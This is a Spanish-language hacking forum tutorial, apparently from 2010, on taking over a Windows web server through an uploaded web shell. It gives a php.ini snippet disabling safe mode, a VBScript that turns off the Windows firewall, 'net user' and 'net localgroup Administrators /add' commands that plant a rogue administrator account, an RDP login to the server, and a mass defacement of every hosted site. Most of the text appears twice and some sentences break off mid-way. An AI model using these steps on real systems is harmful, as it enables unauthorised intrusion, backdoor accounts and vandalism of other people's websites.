Rootear Servidores Windows con SkillmaX
Publicado: 28 Jul 2010, 22:20
Este tutorial es lo que la gente lleva pidiendome que haga desde hace tiempo, ahora me cogi
una cervezita y me puse a hacerlo, un saludo, skillmax.
¿Qué significa rootear una web o un servidor window?
Viene de la palabra root significa un usuario o una persona que tiene todos los permisos como ser el administrador de una web, o tener permisos del admin de una web.
¿Qué necesitamos para rootear una web?
- Subida de una shell (Lo más importante, sin esto, no somos nada)
- Que la shell esté en OFF (not secure) (Lo qué significa que tenemos permisos de escritura y de lectura).
- Buscar un exploit para la versión del servidor (Kernel)
¿Qué hago si no tengo OFF (not secure)?
Pueden probar el codigo que tengo por aquí, que al subirlo modifica el ON SECURE y dandole permisos de OFF (not secure) (Esto funcionará depende de cada servidor)
Si habeis encontrado la versión del kernel que aparece arriba de la shell perfecto, nos
iremos ahora a exploit-db.com y buscaremos el exploit para su respectiva versión.
El kernel de la web es 2.6.9-55.ELsmp, ya he buscado en exploit-db, en inj3ctor, y no aparece nada pues ahora vamos a hacerlo de otra manera
Para hacerlo de otra manera, necesitaremos primero, abrir algún puerto del nuestro router/modem para
ello vamos a hacer un ipconfig en nuestra cmd y nos dará unos numeros por ejemplo 192.168.0.1, ya depende de cada router o modem, se pondrá una pass o otra, en ese tema, no entraré, y abriremos por ejemplo el puerto 1337, es el que sale en casi todos lados, es más en mi shell sale por defecto ese, asi que utilizaremos ese.
He visto en un tutorial de portalhacker que también desactivan el ON SECURE con un codigo en vbs, se los pongo también por si no les funciona el que di anteriormente.
Lo guardamos como firewall.vbs y lo subimos por nuestra shell, le agradezco esta parte a los
amigos de portalhacker por el codigo es de ellos, bueno nosotros a lo nuestro, seguimos.
Hay pondremos ipconfig, para que nos lleve a la pantalla de "comandos" como yo lo llamo, antes de
meter los comandos, primero quiero hacerlo facil y explicaré cada comando importante, que debemos de
usar.
Net user: Nos mostrará todos los usuarios registrados.
Net User ElUserQuetuQuieras LaContraseñaQueTuQuieras[/i]: Una de las partes mas importantes ya que este usuario y esta contraseña que pongas nos la pedirá luego.
Net Localgroup Administrators TuUser /add: Con esto nos registrará el usuario como administrador.
Net User ElUserQuetuQuieras LaContraseñaQueTuQuieras: Una de las partes mas importantes ya que este usuario y esta contraseña que pongas nos la pedirá luego.
Cuando hayamos introducido el comando "Net Localgroup Administrators TuUser /add" y hayamos registrado nuestro nombre como administrador, podemos comprobarlo poniendo "Net User"y el Nombre de Usuario que hemos registrado por ejemplo "Net User Skillmax".
Le damos a execute o a ejecutar, y nos saldrá arriba algo como esto:
User Name: SkillmaX
Full name:
Comandos:
Y más renglones que no voy a poner todos ya que el importante es el User Name que es el que nos
ha indicado que nuestro usuario se a creado como administrador, y tenemos todos los privilegios, Arriba nos saldra la IP del servidor, la cogeremos en mi caso es 102.154.102.68.
Ahora nos vamos a Inicio y le damos a ejecutar y ponemos mstsc.exe, se nos abrirá esto.
Donde pone Ordenador o en mi caso que tengo el S.O en inglés pone Computer ponemos
la IP del servidor y le damos a conectar, nos pedirá autentificación de el usuario y la password que
antes hemos colocado en la shell ¿Os acordais?, en mi caso era de user SkillmaX y de password SkillmaX, ahora ya nos hemos autentificado, ahora estamos en la carpetas del servidor nos apareceran
todas las carpetas del servidor.
Ahora arrastraremos nuestro index a esa carpeta, y pondremos de nombre archivo index.html o index.php y en todas las webs del servidor saldrá nuestro index subido, y se reproducirá nuestro index en todas las webs, cuidado chicos a ver si os va a pasar a los
Un saludo y espero que os haya gustado, skillmax.
una cervezita y me puse a hacerlo, un saludo, skillmax.
¿Qué significa rootear una web o un servidor window?
Viene de la palabra root significa un usuario o una persona que tiene todos los permisos como ser el administrador de una web, o tener permisos del admin de una web.
¿Qué necesitamos para rootear una web?
- Subida de una shell (Lo más importante, sin esto, no somos nada)
- Que la shell esté en OFF (not secure) (Lo qué significa que tenemos permisos de escritura y de lectura).
- Buscar un exploit para la versión del servidor (Kernel)
¿Qué hago si no tengo OFF (not secure)?
Pueden probar el codigo que tengo por aquí, que al subirlo modifica el ON SECURE y dandole permisos de OFF (not secure) (Esto funcionará depende de cada servidor)
Código: Seleccionar todo
register_globals = On
engine = On
safe_mode = Off
safe_mode_exec_dir = On
safe_mode_include_dir =On
Si habeis encontrado la versión del kernel que aparece arriba de la shell perfecto, nos
iremos ahora a exploit-db.com y buscaremos el exploit para su respectiva versión.
El kernel de la web es 2.6.9-55.ELsmp, ya he buscado en exploit-db, en inj3ctor, y no aparece nada pues ahora vamos a hacerlo de otra manera
Para hacerlo de otra manera, necesitaremos primero, abrir algún puerto del nuestro router/modem para
ello vamos a hacer un ipconfig en nuestra cmd y nos dará unos numeros por ejemplo 192.168.0.1, ya depende de cada router o modem, se pondrá una pass o otra, en ese tema, no entraré, y abriremos por ejemplo el puerto 1337, es el que sale en casi todos lados, es más en mi shell sale por defecto ese, asi que utilizaremos ese.
He visto en un tutorial de portalhacker que también desactivan el ON SECURE con un codigo en vbs, se los pongo también por si no les funciona el que di anteriormente.
Código: Seleccionar todo
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.Lo calPolicy.Curr entProfile
objPolicy.Fire wallEnabled = falseLo guardamos como firewall.vbs y lo subimos por nuestra shell, le agradezco esta parte a los
amigos de portalhacker por el codigo es de ellos, bueno nosotros a lo nuestro, seguimos.
Hay pondremos ipconfig, para que nos lleve a la pantalla de "comandos" como yo lo llamo, antes de
meter los comandos, primero quiero hacerlo facil y explicaré cada comando importante, que debemos de
usar.
Net user: Nos mostrará todos los usuarios registrados.
Net User ElUserQuetuQuieras LaContraseñaQueTuQuieras[/i]: Una de las partes mas importantes ya que este usuario y esta contraseña que pongas nos la pedirá luego.
Net Localgroup Administrators TuUser /add: Con esto nos registrará el usuario como administrador.
Net User ElUserQuetuQuieras LaContraseñaQueTuQuieras: Una de las partes mas importantes ya que este usuario y esta contraseña que pongas nos la pedirá luego.
Cuando hayamos introducido el comando "Net Localgroup Administrators TuUser /add" y hayamos registrado nuestro nombre como administrador, podemos comprobarlo poniendo "Net User"y el Nombre de Usuario que hemos registrado por ejemplo "Net User Skillmax".
Le damos a execute o a ejecutar, y nos saldrá arriba algo como esto:
User Name: SkillmaX
Full name:
Comandos:
Y más renglones que no voy a poner todos ya que el importante es el User Name que es el que nos
ha indicado que nuestro usuario se a creado como administrador, y tenemos todos los privilegios, Arriba nos saldra la IP del servidor, la cogeremos en mi caso es 102.154.102.68.
Ahora nos vamos a Inicio y le damos a ejecutar y ponemos mstsc.exe, se nos abrirá esto.
Donde pone Ordenador o en mi caso que tengo el S.O en inglés pone Computer ponemos
la IP del servidor y le damos a conectar, nos pedirá autentificación de el usuario y la password que
antes hemos colocado en la shell ¿Os acordais?, en mi caso era de user SkillmaX y de password SkillmaX, ahora ya nos hemos autentificado, ahora estamos en la carpetas del servidor nos apareceran
todas las carpetas del servidor.
Ahora arrastraremos nuestro index a esa carpeta, y pondremos de nombre archivo index.html o index.php y en todas las webs del servidor saldrá nuestro index subido, y se reproducirá nuestro index en todas las webs, cuidado chicos a ver si os va a pasar a los
Un saludo y espero que os haya gustado, skillmax.